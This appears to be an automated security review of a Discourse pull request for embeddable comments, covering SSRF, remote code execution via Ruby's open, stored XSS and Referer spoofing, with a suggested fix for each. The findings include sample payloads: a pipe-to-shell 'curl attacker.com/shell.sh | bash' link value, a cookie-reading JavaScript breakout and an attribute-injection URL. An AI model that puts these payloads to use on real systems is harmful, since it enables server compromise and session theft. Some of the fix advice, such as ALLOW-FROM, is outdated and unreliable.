Enhance embed URL handling and validation system #76
Conversation
Tenki Code Review - Complete. Files Reviewed: 28.
PR #76 introduces embeddable Discourse comments with critical security and data flow vulnerabilities. The feature allows remote content retrieval via user-controlled URLs.
Overview
PR #76 implements embeddable Discourse comments — a feature allowing external websites to embed Discourse topics as iframes. The implementation includes:
- A new `EmbedController` endpoint (`/embed/best?embed_url=...`)
- Remote content fetching via RSS feeds (`PollFeed`) or direct HTTP import (`TopicEmbed.import_remote`)
- A new `raw_html` cook method that skips HTML sanitization for imported content
- Referer-header-based access control
Critical Security Issues
1. SSRF & RCE via Ruby's Kernel#open (3 findings)
The feature uses `open(url)` to fetch remote content, which is extremely dangerous:
- `Kernel#open` accepts shell commands: URLs starting with `|` are executed as shell commands. A Disqus XML file containing `<link>|curl attacker.sh | bash</link>` would run arbitrary code on the server.
- SSRF to internal services: `open()` also accepts `file://` URIs and non-HTTP schemes, allowing reads from `/etc/passwd`, AWS metadata endpoints (169.254.169.254), or internal databases.
- Redirect-following without host validation: open-uri follows HTTP redirects by default. Even though `TopicRetriever` checks the original URL's host against `embeddable_host`, redirects to internal IPs are not blocked.
Impact: Remote Code Execution, data exfiltration, internal network enumeration.
Fix: Replace `open(url)` with `URI.open(url)` (from OpenURI) or an explicit `Net::HTTP` client, validate URL schemes, and either disable redirects or re-validate redirect destinations.
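A minimal sketch of the suggested fix, assuming a hypothetical `fetch_embed_html` helper (the method and constant names are illustrative, not existing Discourse code):

```ruby
require 'net/http'
require 'uri'

# Hypothetical helper illustrating the suggested fix; not Discourse API.
ALLOWED_SCHEMES = %w[http https]

def valid_embed_url?(url, allowed_host)
  uri = URI.parse(url)
  ALLOWED_SCHEMES.include?(uri.scheme) && uri.host == allowed_host
rescue URI::InvalidURIError
  false
end

def fetch_embed_html(url, allowed_host)
  raise ArgumentError, "disallowed embed URL" unless valid_embed_url?(url, allowed_host)
  # Net::HTTP.get_response does not follow redirects, so a redirect to an
  # internal host is surfaced here instead of being silently followed.
  response = Net::HTTP.get_response(URI.parse(url))
  raise "unexpected redirect to #{response['location']}" if response.is_a?(Net::HTTPRedirection)
  response.body
end
```

Unlike `Kernel#open`, this cannot execute `|`-prefixed pipe commands or read `file://` URIs, and redirects are rejected rather than followed.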
2. Stored XSS from Unsanitized Fetched HTML (2 findings)
- Remote HTML is fetched, stored with `cook_method: :raw_html`, and rendered with `<%= raw post.cooked %>`.
- The `Post#cook` method bypasses all sanitization when `cook_method == :raw_html`, returning the raw content verbatim.
- Attacker-controlled content from RSS feeds or the `embed_url` parameter can inject `<script>` tags, `javascript:` URLs, or event handlers.
- Readability's tag allowlist in `import_remote` doesn't prevent `javascript:` hrefs or `<img onerror=...>` injections.
Impact: Stored XSS in all views of the embed iframe. Malicious JavaScript executes in the viewer's browser.
Fix: Use the Rails `sanitize` helper with an explicit allowlist, or run the HTML through Loofah before rendering.
3. Referer-Only Access Control (Easily Spoofed)
The entire access gate relies on the HTTP Referer header:
- Referer is trivially spoofed in any HTTP client
- Suppressed by privacy-oriented browsers and HTTPS→HTTP downgrades
- An attacker can forge `Referer: https://embeddable_host/` and invoke SSRF attacks
Fix: Implement token-based access (HMAC-signed URLs or session tokens) instead of Referer validation.
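A sketch of the HMAC-signed approach using only the Ruby standard library; the secret handling and method names here are assumptions for illustration, not existing Discourse code:

```ruby
require 'openssl'

# Illustrative only: in practice the secret would come from server-side
# site settings, never be embedded in client markup.
EMBED_SECRET = 'server-side secret from site settings'

# The embedding page is issued a token derived from the exact embed_url.
def embed_token(embed_url)
  OpenSSL::HMAC.hexdigest('SHA256', EMBED_SECRET, embed_url)
end

# Server-side check: recompute the HMAC and compare in constant time,
# instead of trusting the spoofable Referer header.
def valid_embed_token?(embed_url, token)
  OpenSSL.secure_compare(embed_token(embed_url), token)
end
```

With this scheme, forging a request requires knowledge of the server-side secret, not just a crafted Referer header.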
4. Referer Header Injection into JavaScript
The embed layout interpolates `request.referer` directly into a JavaScript string literal used for the `postMessage` `targetOrigin`:

```js
parent.postMessage({...}, '<%= request.referer %>'); // VULNERABLE
```

A crafted Referer like `'); alert(document.cookie); ('` breaks out of the string literal and executes arbitrary JavaScript.
Fix: Use the configured `embeddable_host` as the `targetOrigin`, and always escape with the `j` (`escape_javascript`) helper if dynamic values are needed.
5. Non-Standard Framing Header
`X-Frame-Options: ALLOWALL` is not recognized by modern browsers and provides no clickjacking protection.
Fix: Use `ALLOW-FROM https://embeddable_host` or a `Content-Security-Policy: frame-ancestors` directive.
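A sketch of the replacement headers as a plain hash builder (the helper name is hypothetical; in a Rails controller these would be assigned to `response.headers`):

```ruby
# frame-ancestors is the directive modern browsers enforce;
# ALLOW-FROM is a legacy fallback honored only by some older browsers.
def embed_framing_headers(host)
  {
    'Content-Security-Policy' => "frame-ancestors https://#{host}",
    'X-Frame-Options'         => "ALLOW-FROM https://#{host}"
  }
end
```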
High-Priority Code Quality Issues
Non-Atomic Redis SETNX + EXPIRE
Throttle logic uses two separate Redis commands. If the process crashes between them, the key is set but never expires, permanently blocking all future retrieval for that URL.
Fix: Use the atomic `SET key value EX 60 NX` form instead.
Post Creation Failures Not Guarded
In `disqus.thor`, the loop reassigns the `post` variable without nil checks. If `PostCreator.create` fails (returns nil), accessing `post.post_number` raises `NoMethodError` and crashes the import.
Fix: Add nil checks and use separate variable names (`topic_post` vs `reply_post`).
Missing Nil Checks on RSS Feed Content
`i.content.scrub` without a guard crashes if the RSS item lacks a content field, and the job exits before processing the remaining items.
Fix: Use `(i.content || i.summary || i.description || '').scrub`.
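The guarded extraction can be sketched as a small helper; the method name and the `FeedItem` stub are illustrative, not the actual feed library types:

```ruby
# Fall back through the common RSS/Atom content fields before calling
# String#scrub, so items without <content> no longer crash the job.
def feed_item_content(item)
  (item.content || item.summary || item.description || '').scrub
end

# Stub standing in for a parsed RSS feed item in this sketch.
FeedItem = Struct.new(:content, :summary, :description)
```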
PostRevisor Save Not Guarded
When `@post.save(validate: ...)` returns false due to validation, `save_reply_relationships` still runs on an unsaved post, creating stale DB records.
Fix: Guard the call on save success: `saved = @post.save(...); @post.save_reply_relationships if saved`.
String Mutation and Hardcoded Port Logic
Minor bugs in URL processing and string handling that can cause spurious revisions and incorrect URL reconstruction.
Authorization & Privilege Escalation
The `cook_method` parameter is settable from `PostCreator` opts without an authorization check. Although the web controller's params whitelist currently excludes it, internal code paths or future API additions could expose it, allowing end users to bypass all HTML sanitization.
Fix: Guard the assignment: `post.cook_method = ... if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations])`.
Summary of Assessment
This PR introduces multiple CRITICAL vulnerabilities that enable:
- Remote Code Execution via malicious Disqus XML or attacker-controlled embed URLs
- Stored XSS attacks delivering malicious scripts to all topic viewers
- SSRF to internal services (AWS metadata, databases, etc.)
- Trivially spoofable access control
Recommendation: Request Changes. Do not merge until all critical issues (SSRF, RCE, Stored XSS, access control) are addressed. The feature is architecturally risky — fetching and rendering arbitrary remote HTML inherently requires bulletproof sanitization, strict URL validation, and secure HTTP clients.
```ruby
if topic_id
  @topic_view = TopicView.new(topic_id, current_user, {best: 5})
else
  Jobs.enqueue(:retrieve_topic, user_id: current_user.try(:id), embed_url: embed_url)
```
🚨 SSRF via user-controlled embed_url triggers open() to arbitrary URL (security)
In EmbedController#best (line 9), the embed_url parameter comes directly from user-supplied query parameters. When no existing topic embed is found, this value is passed verbatim to Jobs.enqueue(:retrieve_topic, embed_url: embed_url). Inside Jobs::RetrieveTopic#execute, it is passed to TopicRetriever.new(@embed_url), which calls TopicEmbed.import_remote(user, @embed_url), which calls open(url).read (Ruby's Kernel#open / open-uri). Although TopicRetriever#invalid_host? checks that the URL's host matches SiteSetting.embeddable_host, this check only runs for pre-validated embeds after the job is enqueued — the URL is already accepted by the controller before any host validation occurs (the controller only checks the HTTP Referer header, not the embed_url itself). More critically, Kernel#open also accepts pipe-prefixed strings (|command) on older Ruby/open-uri combinations that allow OS command execution. Even if host validation were reliable, a URL with a valid host prefix but path traversal (e.g. query string exploits) can reach internal services.
💡 Suggestion: Validate embed_url against the configured embeddable_host in the controller before enqueuing the job, not just in the retriever. Use URI.parse and compare the host explicitly, and reject any URL whose scheme is not http or https. Additionally, replace open(url) in import_remote with Net::HTTP or a whitelisted HTTP client that cannot be used for file/pipe access.
📋 Prompt for AI Agents
In app/controllers/embed_controller.rb, before calling Jobs.enqueue at line 15, add host validation of embed_url: parse it with URI.parse, verify the scheme is http/https and the host matches SiteSetting.embeddable_host, and raise Discourse::InvalidAccess if either check fails. In app/models/topic_embed.rb at line 48, replace open(url).read with an explicit HTTP fetch using Net::HTTP or Faraday so that file:// and pipe-exec URIs are never processed.
```ruby
require 'ruby-readability'

opts = opts || {}
doc = Readability::Document.new(open(url).read,
```
🚨 SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML (security)
The PR replaces PostCreator with TopicEmbed.import_remote(user, t[:link], ...) at line 148. The value t[:link] is read directly from the <link> element of the Disqus XML export file (parsed at disqus.thor:58). Inside TopicEmbed.import_remote (topic_embed.rb:48), Ruby's Kernel#open(url) is called with this attacker-controlled value before any URL validation.
Ruby's Kernel#open has two critical behaviours beyond HTTP:
- Remote Code Execution: if the URL begins with `|`, it is interpreted as a shell command. A Disqus XML containing `<link>|curl attacker.com/shell.sh | bash</link>` would execute arbitrary shell commands on the import host.
- SSRF / local file read: URLs with a `file://` scheme or internal addresses (e.g., `http://169.254.169.254/`) allow reading arbitrary local files or probing internal services.
The https?:// guard in TopicEmbed.import (line 11) does NOT protect against this because open(url) in import_remote is called at line 48 before import is invoked at line 52. The TopicRetriever code path validates the host against SiteSetting.embeddable_host, but the Disqus importer bypasses that validation entirely.
💡 Suggestion: Replace Kernel#open(url) with an explicit HTTP client call (e.g., Net::HTTP.get(URI(url)) or open-uri with explicit URI.open) and validate the URL scheme before fetching. Add a guard at the start of import_remote that rejects non-http(s) URLs (matching the guard already present in import). Additionally, validate t[:link] in disqus.thor before passing it to import_remote.
```diff
- doc = Readability::Document.new(open(url).read,
+ doc = Readability::Document.new(URI.open(url).read,
```
📋 Prompt for AI Agents
In app/models/topic_embed.rb, the import_remote method at line 44 uses Ruby's Kernel#open(url) at line 48 to fetch a URL that can originate from an attacker-controlled Disqus XML file (via lib/tasks/disqus.thor line 148). Ruby's Kernel#open executes shell commands when the string starts with '|', enabling RCE. Fix this by: (1) adding a URL scheme check at the top of import_remote identical to the one in import (line 11): return unless url =~ /^https?:\/\//; (2) replacing open(url) with URI.open(url) (from OpenURI) or an explicit Net::HTTP call to avoid the shell-dispatch behaviour of Kernel#open. Also add require 'open-uri' if not already present.
```ruby
def self.import(user, url, title, contents)
  return unless url =~ /^https?\:\/\//

  contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"
```
🔴 Mutating contents parameter in-place causes double-appended footer on repeated calls (bug)
In `TopicEmbed.import` (line 13), `contents << "..."` mutates the string argument in place. The SHA1 (line 16) is computed *after* the mutation, so the stored SHA1 always includes the footer. If a caller ever passes the same mutable string on a second call (or if the same string object is reused), the footer will be appended again before the SHA1 comparison, producing a different hash and triggering a spurious `PostRevisor` revision even when the upstream content has not changed.
💡 Suggestion: Avoid mutating the caller's string. Build the full content as a new local variable before computing the SHA1 and passing it downstream.
```diff
- contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"
+ full_contents = contents + "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"
```
📋 Prompt for AI Agents
In app/models/topic_embed.rb at line 13, replace contents << "\n<hr>..." with full_contents = contents + "\n<hr>..." (use + instead of << to avoid mutating the caller's string). Then update all subsequent uses of contents in this method (lines 16, 22, 36) to use full_contents instead, so the SHA1 and the post body both reflect the footer-appended version without side-effecting the caller.
```erb
<img src='<%= post.user.small_avatar_url %>'>
<h3><%= post.user.username %></h3>
</div>
<div class='cooked'><%= raw post.cooked %></div>
```
🚨 Stored XSS: externally-fetched HTML stored and rendered without sanitization (security)
Content retrieved from the remote embed_url via Readability::Document is passed through TopicEmbed.import where it is stored with cook_method: Post.cook_methods[:raw_html]. In Post#cook (post.rb line 133), when cook_method is :raw_html the method simply returns self.raw — the unsanitized HTML string. This cooked value is then rendered in best.html.erb line 19 using Rails' raw helper (<%= raw post.cooked %>), bypassing all output encoding. An attacker who controls the content at embed_url (or who can perform a MITM / DNS rebind) can inject arbitrary JavaScript that executes in the origin of the Discourse embed iframe. Readability's tag/attribute allowlist in import_remote provides some mitigation but does NOT prevent javascript: href values, <script> tags included via other vectors, or <img onerror=...> injections since onerror is not in the excluded attribute list.
💡 Suggestion: Do not use raw to render imported HTML. Run post.cooked through a strict HTML sanitizer (e.g., Rails Sanitize helper with an explicit allowlist, or Loofah) before rendering. Alternatively, store the Readability-sanitized content at import time and validate it on retrieval.
```diff
- <div class='cooked'><%= raw post.cooked %></div>
+ <div class='cooked'><%= sanitize post.cooked, tags: %w[p b i em strong a div span h1 h2 h3 h4 h5 h6 ul ol li blockquote pre code img br hr], attributes: %w[href src class alt title target] %></div>
```
📋 Prompt for AI Agents
In app/views/embed/best.html.erb at line 19, replace <%= raw post.cooked %> with <%= sanitize post.cooked, tags: %w[p b i em strong a div span h1 h2 h3 h4 h5 h6 ul ol li blockquote pre code img br hr], attributes: %w[href src class alt title target] %> to prevent stored XSS from externally-fetched HTML rendered without encoding.
```ruby
if $redis.setnx(retrieved_key, "1")
  $redis.expire(retrieved_key, 60)
  return false
end
```
🔴 Non-atomic Redis SETNX + EXPIRE creates permanent throttle lock on crash (bug)
In retrieved_recently? (lines 27-28), $redis.setnx(retrieved_key, "1") and $redis.expire(retrieved_key, 60) are two separate commands. If the process is killed, an exception is raised, or the Redis connection drops between the two calls, the key is set but never gets an expiry. As a result, setnx will always return false for that URL from that point on, permanently suppressing topic retrieval for it — the throttle becomes an eternal lock.
The fix is to use SET key value EX 60 NX (available via $redis.set(key, '1', ex: 60, nx: true) with redis-rb >= 3.x), which is atomic.
💡 Suggestion: Replace the two-step SETNX + EXPIRE with a single atomic SET key value EX seconds NX call: $redis.set(retrieved_key, '1', ex: 60, nx: true). This is atomic and eliminates the race condition.
📋 Prompt for AI Agents
In lib/topic_retriever.rb, the retrieved_recently? method (lines 27-30) uses a non-atomic SETNX + EXPIRE pattern. Replace the two-step call with a single atomic SET NX EX call:
Change:
```ruby
if $redis.setnx(retrieved_key, "1")
  $redis.expire(retrieved_key, 60)
  return false
end
```
To:
```ruby
if $redis.set(retrieved_key, "1", ex: 60, nx: true)
  return false
end
```
This prevents a permanent lock if the process crashes between the setnx and expire calls.
```ruby
def ensure_embeddable
  raise Discourse::InvalidAccess.new('embeddable host not set') if SiteSetting.embeddable_host.blank?
  raise Discourse::InvalidAccess.new('invalid referer host') if URI(request.referer || '').host != SiteSetting.embeddable_host
```
🔴 Referer-only authentication for embed endpoint is trivially bypassable (security)
The ensure_embeddable filter in EmbedController (lines 25-26) relies exclusively on the HTTP Referer header to verify that requests come from the configured embeddable host. The Referer header is: (1) easily spoofed in any HTTP client, (2) not sent by many privacy-oriented browsers/extensions, and (3) stripped by HTTPS→HTTP downgrades. An attacker can craft a request from anywhere with Referer: https://embeddable_host/ to pass this check and invoke Jobs.enqueue(:retrieve_topic, embed_url: attacker_url), triggering an SSRF to any URL that passes TopicRetriever#invalid_host?. Combined with the SSRF finding (sec-001), this amplifies the attack surface.
💡 Suggestion: Do not rely on the Referer header as a security control. Implement an embed token or HMAC-signed URL scheme where the embedding page includes a server-issued token that the Discourse server verifies. Additionally, validate the embed_url parameter against the configured host independently of the Referer check.
📋 Prompt for AI Agents
In app/controllers/embed_controller.rb, the ensure_embeddable filter (lines 24-31) uses only the HTTP Referer header for access control. Add a secondary control: validate that params[:embed_url] (when present) has a host matching SiteSetting.embeddable_host, and consider issuing HMAC-signed embed tokens that are verified server-side instead of trusting the Referer header.
```ruby
  post.send("#{a}=", @opts[a]) if @opts[a].present?
end

post.cook_method = @opts[:cook_method] if @opts[:cook_method].present?
```
🔴 Unsanitized cook_method from opts allows raw HTML bypass in PostCreator (security)
The new line post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? in PostCreator#setup_post (lib/post_creator.rb:216) allows any caller that can supply opts to set the post's cook_method. When cook_method equals Post.cook_methods[:raw_html], the Post#cook method bypasses the entire sanitization pipeline and returns the raw content verbatim (app/models/post.rb:133). There is no authorization check ensuring only privileged callers can set this value. The TopicEmbed.import path (app/models/topic_embed.rb:22) intentionally uses cook_method: Post.cook_methods[:raw_html] with content fetched from a remote URL — any XSS in that remote content will be stored and served as-is. If a future API path or a bypassed controller exposes this parameter to end users, it becomes a stored XSS vulnerability. The posts_controller.rb#create_params currently excludes cook_method from the permitted params whitelist, but no enforcement is done inside PostCreator itself.
💡 Suggestion: Guard the cook_method assignment behind an authorization check. Only staff/system users or internal callers should be allowed to set cook_method to raw_html. Add a check such as: if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations]) then post.cook_method = @opts[:cook_method] end. Alternatively, validate that the supplied cook_method value is not raw_html unless the caller is trusted.
```diff
- post.cook_method = @opts[:cook_method] if @opts[:cook_method].present?
+ post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations])
```
📋 Prompt for AI Agents
In lib/post_creator.rb at line 216, the assignment post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? allows any caller to set cook_method to raw_html, which bypasses HTML sanitization in Post#cook. Restrict this assignment to trusted callers only: change the line to post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations]). This ensures that only staff users or internal system calls (which already use skip_validations: true) can request raw HTML rendering, preventing a future API exposure from becoming a stored XSS vector.
```ruby
@post.save(validate: !@opts[:skip_validations])

@post.save_reply_relationships
```
🟠 save_reply_relationships called unconditionally even when save fails (bug)
In update_post (lines 85-87 of post_revisor.rb), @post.save(validate: !@opts[:skip_validations]) can return false if the post fails validation (i.e., when skip_validations is falsy). Despite this, @post.save_reply_relationships is always called on the next line regardless of whether the save succeeded.
save_reply_relationships queries and creates PostReply records based on @post.quoted_post_numbers. If the post was not actually saved (or was saved in a dirty state), these relationships may be created for a post whose content was not persisted, leading to stale or incorrect reply relationships in the database.
Note: the original code had @post.save (always validates, always succeeds or raises), so this bug is introduced by the new validate: option.
💡 Suggestion: Guard save_reply_relationships with a check on the save result: if @post.save(validate: !@opts[:skip_validations]); @post.save_reply_relationships; end. Alternatively, raise or return early on save failure consistent with the rest of the codebase.
📋 Prompt for AI Agents
In lib/post_revisor.rb, the update_post method (lines 85-87) calls @post.save_reply_relationships unconditionally after @post.save(validate: ...). If save returns false due to validation errors, reply relationships are still created for an unsaved post.
Change lines 85-87 from:
```ruby
@post.save(validate: !@opts[:skip_validations])
@post.save_reply_relationships
```
To:
```ruby
saved = @post.save(validate: !@opts[:skip_validations])
@post.save_reply_relationships if saved
```
This ensures that reply relationships are only written to the database when the post was actually saved successfully.
```ruby
def self.absolutize_urls(url, contents)
  uri = URI(url)
  prefix = "#{uri.scheme}://#{uri.host}"
  prefix << ":#{uri.port}" if uri.port != 80 && uri.port != 443
```
🟠 Port-stripping logic in absolutize_urls uses hardcoded ports instead of scheme-relative defaults (bug)
In app/models/topic_embed.rb line 59, the port is omitted from the constructed prefix only when uri.port != 80 && uri.port != 443. This hardcodes port numbers rather than comparing against the URI's default port for the given scheme. For example, an http:// URL using port 443 would have its port silently dropped from the prefix (since 443 is excluded), producing an incorrect base URL. The semantically correct check is uri.port != uri.default_port.
💡 Suggestion: Replace the hardcoded port check with uri.port != uri.default_port to correctly handle non-standard port combinations.
```diff
- prefix << ":#{uri.port}" if uri.port != 80 && uri.port != 443
+ prefix << ":#{uri.port}" if uri.port != uri.default_port
```
📋 Prompt for AI Agents
In app/models/topic_embed.rb at line 59, replace if uri.port != 80 && uri.port != 443 with if uri.port != uri.default_port. The URI#default_port method returns the scheme-appropriate default port (80 for http, 443 for https), making this correct for all URI schemes rather than hardcoding two magic numbers.
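The behaviour difference can be seen directly with Ruby's standard `URI` library:

```ruby
require 'uri'

# An http URL explicitly on port 443: the hardcoded 80/443 check would
# silently drop the port, but default_port correctly reports that 443 is
# NOT the default for http, so the port must be kept in the prefix.
odd = URI("http://example.com:443/feed")
odd.port          # => 443
odd.default_port  # => 80

# A plain https URL: port equals the scheme default, so no suffix is needed.
plain = URI("https://example.com/feed")
plain.port == plain.default_port  # => true
```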
```ruby
# First check RSS if that is enabled
if SiteSetting.feed_polling_enabled?
  Jobs::PollFeed.new.execute({})
```
🟠 Synchronous PollFeed.new.execute({}) blocks caller and polls entire feed for one URL (performance)
In perform_retrieve (line 41), Jobs::PollFeed.new.execute({}) is called synchronously. PollFeed#execute makes an outbound HTTP request to fetch the RSS feed URL, then iterates over all feed items and imports them via TopicEmbed.import. This entire blocking operation happens inline — potentially from a web request context — and is not bounded by the specific @embed_url being retrieved. It polls the entire feed just to check if one URL now exists. If the feed URL is slow or unavailable, the caller hangs.
💡 Suggestion: Enqueue the job asynchronously (Jobs.enqueue(:poll_feed)) instead of calling execute directly, then return immediately. Accept that the embed may appear on the next poll cycle rather than the same request.
📋 Prompt for AI Agents
In lib/topic_retriever.rb line 41, Jobs::PollFeed.new.execute({}) is called synchronously, which blocks the caller thread with an outbound HTTP request and a full feed import loop.
Change line 41 from:
```ruby
Jobs::PollFeed.new.execute({})
```
To:
```ruby
Jobs.enqueue(:poll_feed)
```
This schedules the poll asynchronously so the caller is not blocked by network I/O or long import work. The embed will be available after the job completes rather than immediately, which is the appropriate behavior for a background retrieval system.
```erb
<%= link_to(I18n.t('embed.title'), @topic_view.topic.url, class: 'button', target: '_blank') %>
<%- else %>
<%= link_to(I18n.t('embed.start_discussion'), @topic_view.topic.url, class: 'button', target: '_blank') %>
<%- end if %>
```
🟡 ERB template end if typo creates accidental postfix conditional
On line 6 of best.html.erb, `<%- end if %>` should be `<%- end %>`. In the generated Ruby code, `end if` becomes a postfix conditional: Ruby parses it as `end if <next_erb_output_expression>`, where the next expression (the buffer append for the whitespace/link_to on the following lines) is always truthy. This means the if/else block executes correctly by accident, but the `if` is clearly unintentional. It also causes the condition expression (the next output) to be evaluated before the if/else block (Ruby evaluates the postfix `if` condition first), subtly reordering output.
```diff
- <%- end if %>
+ <%- end %>
```
```ruby
url = i.link
url = i.id if url.blank? || url !~ /^https?\:\/\//

content = CGI.unescapeHTML(i.content.scrub)
```
🔴 NoMethodError when RSS feed items lack content element
`i.content` will be nil for RSS feeds that use `<description>` instead of `<content>` (which is very common in RSS 2.0 feeds). Calling `.scrub` on nil raises `NoMethodError: undefined method 'scrub' for nil:NilClass`, which crashes the entire poll_feed scheduled job and prevents any feed items from being imported.
```diff
- content = CGI.unescapeHTML(i.content.scrub)
+ content = CGI.unescapeHTML((i.content || i.description).scrub)
```
```ruby
def self.import(user, url, title, contents)
  return unless url =~ /^https?\:\/\//

  contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"
```
🔴 URL interpolated into HTML without escaping enables XSS in raw_html posts
The url parameter is directly interpolated into an HTML <a> tag using single-quoted attributes: <a href='#{url}'>#{url}</a>. If the URL contains a single quote (e.g. http://example.com/?x=' onclick='alert(1)), it breaks out of the href attribute and can inject arbitrary HTML attributes like event handlers. This content passes through absolutize_urls (Nokogiri preserves the injected attributes), then is stored as a raw_html post where Post#cook returns the raw content directly (app/models/post.rb:133). The content is then rendered unescaped via <%= raw post.cooked %> in app/views/embed/best.html.erb:19. An attacker who controls RSS feed item URLs or crafts a malicious embed URL can inject XSS into the Discourse application.
📋 Prompt for AI Agents
In TopicEmbed.import (app/models/topic_embed.rb:13), the url parameter is interpolated directly into an HTML string without HTML-escaping. This creates XSS risk because URLs can contain single quotes that break out of the href attribute. The url is used in two contexts: as an href attribute value and as visible text content. Both need to be HTML-escaped.
The fix should use ERB::Util.html_escape (aliased as h or ERB::Util.h) to escape the URL before interpolation. For example:
```ruby
safe_url = ERB::Util.html_escape(url)
contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{safe_url}'>#{safe_url}</a>")}</small>\n"
```
Alternatively, switch to double quotes for the href attribute to match Nokogiri's serialization style, and still escape the URL.
```javascript
function postMessageReceived(e) {
  if (!e) { return; }
  if (discourseUrl.indexOf(e.origin) === -1) { return; }
```
🟡 postMessage origin check uses indexOf allowing prefix-matching origins
The origin validation discourseUrl.indexOf(e.origin) === -1 checks whether e.origin is a substring of discourseUrl. This means any origin that is a prefix of the Discourse URL passes the check. For example, if discourseUrl is http://discourse.example.com/, an attacker's origin http://discourse.example.co (a different domain) would pass because indexOf returns 0. The correct approach is to compare origins directly, e.g. by extracting the origin from discourseUrl and comparing with strict equality.
```diff
- if (discourseUrl.indexOf(e.origin) === -1) { return; }
+ if (discourseUrl.replace(/\/$/, '') !== e.origin) { return; }
```